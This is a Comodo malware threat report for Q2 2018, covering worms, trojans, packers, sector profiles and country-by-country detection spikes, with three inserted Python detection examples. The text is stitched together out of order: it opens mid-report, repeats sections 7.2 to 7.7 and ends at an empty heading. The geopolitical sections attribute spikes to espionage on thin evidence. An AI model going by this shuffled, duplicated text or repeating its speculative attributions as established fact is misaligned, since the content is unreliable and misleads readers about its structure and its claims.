This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free.” Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news,” Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today, there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day, as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises, but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility.”


7.10 Finland, Russia, USA

Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals’ bias to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394. sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures, from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.




4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April (chart)

4.2.2 May 2018

Android-targeted malware in May (chart)



4.2.3 June 2018

Android-targeted malware in June (chart)



5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries’ top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus, but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called “Strategic Threat” due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world’s most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda, and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr), and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a “multi-threaded, polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany, and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects “.exe” and “.scr” files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section, we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
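The behaviour attributed to Starter above (a new local account that is immediately placed in the administrator group) leaves a clear trail in the Windows Security log: event 4720 (a user account was created) followed by event 4732 (a member was added to a security-enabled local group). The Python below is an added example, not code from the Comodo report or from Microsoft; it correlates the two events within a short window. The event records are constructed samples with simplified field names (in the real log XML the new account is `TargetUserName` in 4720, and in 4732 the group is `TargetUserName` and the member is `MemberName`/`MemberSid`); the account name "Remote Service Account" is reused from the report's description as a constructed value.

```python
"""Correlate Windows Security events 4720 (account created) and 4732
(member added to a local group) to flag accounts that were created and
made administrators within a short window.  Added example, not Comodo's
or Microsoft's code; the events below are constructed samples."""
from datetime import datetime

# Constructed sample events (not real log data).  'ts' is ISO-8601, 'id'
# the Windows Security event ID.  Field mapping from the real log XML:
#   4720: target  <- TargetUserName (new account), subject <- SubjectUserName
#   4732: member  <- MemberName (often "-", then resolve MemberSid),
#         group   <- TargetUserName (the group), subject <- SubjectUserName
SAMPLE_EVENTS = [
    {"ts": "2018-06-02T09:14:03", "id": 4720, "target": "svc_backup", "subject": "Administrator"},
    {"ts": "2018-06-02T09:14:05", "id": 4732, "member": "svc_backup", "group": "Administrators", "subject": "Administrator"},
    {"ts": "2018-06-02T11:40:10", "id": 4720, "target": "helpdesk01", "subject": "Administrator"},
    {"ts": "2018-06-02T11:40:11", "id": 4732, "member": "helpdesk01", "group": "Remote Desktop Users", "subject": "Administrator"},
    {"ts": "2018-06-03T02:01:00", "id": 4720, "target": "Remote Service Account", "subject": "SYSTEM"},
    {"ts": "2018-06-03T02:01:02", "id": 4732, "member": "Remote Service Account", "group": "Administrators", "subject": "SYSTEM"},
    # A 4732 with no preceding 4720: an existing user promoted, not flagged here.
    {"ts": "2018-06-03T08:00:00", "id": 4732, "member": "jdoe", "group": "Administrators", "subject": "Administrator"},
]

# Groups whose membership is worth alerting on; tune per environment.
PRIVILEGED_GROUPS = ("Administrators", "Remote Desktop Users")


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def find_new_admin_accounts(events, window_seconds=600, groups=("Administrators",)):
    """Return (account, created_at, group, subject) for every account that
    was created (4720) and then added to one of `groups` (4732) within
    `window_seconds`.  Events are processed in timestamp order, so the
    4720 must precede the 4732."""
    created = {}   # account name -> timestamp of its most recent 4720
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 4720:
            created[ev["target"]] = _parse(ev["ts"])
        elif ev["id"] == 4732 and ev["group"] in groups:
            member = ev["member"]
            if member in created:
                delta = (_parse(ev["ts"]) - created[member]).total_seconds()
                if 0 <= delta <= window_seconds:
                    hits.append((member, created[member].isoformat(), ev["group"], ev["subject"]))
    return hits


if __name__ == "__main__":
    for hit in find_new_admin_accounts(SAMPLE_EVENTS):
        print("new privileged account:", hit)
```

The default only watches the Administrators group; passing `groups=PRIVILEGED_GROUPS` widens the net to the remote-access groups a RAT operator would equally value. On a real host the 4732 record frequently carries only the member's SID, so resolve `MemberSid` to a name (or key the dictionary on SIDs from the 4720 `TargetSid`) before running this correlation.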

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
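Two cheap indicators catch most of what this section describes: compressed or encrypted code has byte entropy close to the 8-bit maximum, and the stock UPX packer leaves recognisable section names (UPX0, UPX1, and the "UPX!" signature) in the file. The Python below is an added example, not code from the Comodo report; the UPX names are the ones the unmodified packer writes (a modified build such as the MUPX the report mentions may rename them, which is why the entropy check is the more robust of the two), the 7.0 bits/byte threshold is a common rule of thumb rather than a published constant, and both sample byte strings are constructed in-line rather than taken from real binaries.

```python
"""Flag likely-packed executables with two indicators: high byte entropy
(compressed or encrypted code approaches 8 bits/byte) and the section
names the stock UPX packer writes.  Added example, not part of the Comodo
report; the sample inputs are constructed, not real binaries."""
import hashlib
import math
from collections import Counter

# Real markers left by an unmodified UPX build: section names and signature.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX2", b"UPX!")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sliding_entropy(data: bytes, window: int = 512) -> list:
    """Entropy of consecutive non-overlapping windows.  A small plaintext
    stub followed by a compressed payload shows as low, then high, values."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def packer_indicators(data: bytes, threshold: float = 7.0) -> dict:
    """Summarise why a blob looks packed.  `threshold` (bits/byte) is a
    rule of thumb for 'compressed or encrypted'; tune it on your own corpus."""
    ent = shannon_entropy(data)
    windows = sliding_entropy(data)
    markers = [m.decode() for m in UPX_MARKERS if m in data]
    return {
        "entropy": round(ent, 3),
        "high_entropy": ent >= threshold,
        "high_entropy_windows": sum(1 for w in windows if w >= threshold),
        "upx_markers": markers,
        "likely_packed": ent >= threshold or bool(markers),
    }


def _pseudo_random(n: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic high-entropy filler (a SHA-256 chain) standing in for
    a compressed payload, so the example runs the same way everywhere."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


# Constructed samples (not real executables).
PLAIN_SAMPLE = b"This is ordinary program text, repetitive and low in entropy. " * 40
PACKED_SAMPLE = b"MZ" + b"\0" * 62 + b"UPX0" + b"UPX1" + _pseudo_random(4096)


if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, packer_indicators(blob))
```

A whole-file entropy score is easily diluted by a large low-entropy overlay or resource section, so the per-window count is the number worth alerting on; a real PE should additionally be parsed by section so that entropy is measured per section rather than over the raw file.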

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
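Every country section that follows rests on the same reading: a day whose detection count "stands out" from the baseline. Eyeballing a chart does not scale to 237 ccTLDs, so the Python below is an added example (not Comodo's own analytics, which the report does not publish) of how a defender would flag such days automatically. It aggregates raw (country, day) detection records into per-country timelines and scores each day with a robust z-score built on the median and the median absolute deviation (MAD), so that a single huge spike cannot inflate the baseline and hide itself, the way it would with a mean and standard deviation. The daily counts and the 3.5 threshold are constructed for the example; the "ten times the usual" ratio fallback mirrors the way the North Korea section below describes its spike.

```python
"""Flag outlier days in a per-country malware detection timeline using a
robust z-score (median / MAD).  Added example, not Comodo's analytics;
the detection records and daily counts below are constructed."""
from statistics import median

MAD_TO_SIGMA = 1.4826   # scales MAD to a normal distribution's std-dev


def daily_counts(records):
    """Aggregate raw (ccTLD, ISO-day) detection records into
    {ccTLD: [(day, count), ...]} timelines sorted by day."""
    table = {}
    for cc, day in records:
        table.setdefault(cc, {}).setdefault(day, 0)
        table[cc][day] += 1
    return {cc: sorted(days.items()) for cc, days in table.items()}


def robust_spikes(timeline, z_threshold=3.5, ratio_threshold=3.0):
    """Return [(day, count, z, ratio)] for days whose count is an outlier.

    z is the distance from the median in scaled-MAD units; a day is
    flagged when z exceeds z_threshold.  If MAD is zero (a flat baseline,
    e.g. a country with almost no detections), z is undefined, so the day
    is flagged only when its count is >= ratio_threshold times the median."""
    counts = [c for _, c in timeline]
    if not counts:
        return []
    med = median(counts)
    mad = median(abs(c - med) for c in counts) * MAD_TO_SIGMA
    flagged = []
    for day, c in timeline:
        ratio = c / med if med else float("inf")
        if mad > 0:
            z = (c - med) / mad
            hit = z > z_threshold
        else:
            z = float("inf") if c != med else 0.0
            hit = ratio >= ratio_threshold
        if hit:
            flagged.append((day, c, round(z, 1), round(ratio, 2)))
    return flagged


# Constructed daily detection counts for one country (not real data):
# a steady baseline, a modest bump on 03-16 and a large spike on 03-13.
SAMPLE_TIMELINE = [
    ("2018-03-01", 1180), ("2018-03-02", 1215), ("2018-03-03", 1160),
    ("2018-03-04", 1240), ("2018-03-05", 1195), ("2018-03-06", 1230),
    ("2018-03-07", 1170), ("2018-03-08", 1205), ("2018-03-09", 1250),
    ("2018-03-10", 1185), ("2018-03-11", 1220), ("2018-03-12", 1200),
    ("2018-03-13", 9800), ("2018-03-14", 1210), ("2018-03-15", 1190),
    ("2018-03-16", 1290), ("2018-03-17", 1225), ("2018-03-18", 1165),
    ("2018-03-19", 1245), ("2018-03-20", 1200),
]


if __name__ == "__main__":
    for day, count, z, ratio in robust_spikes(SAMPLE_TIMELINE):
        print(f"{day}: {count} detections, z={z}, {ratio}x median")
```

With this baseline the 03-13 day scores a z of several hundred and about 8 times the median, while the 03-16 bump stays below the threshold; lowering `z_threshold` trades that quiet for more alerts. Feeding `robust_spikes` the per-country lists returned by `daily_counts` gives one pass over the whole detection feed.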

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

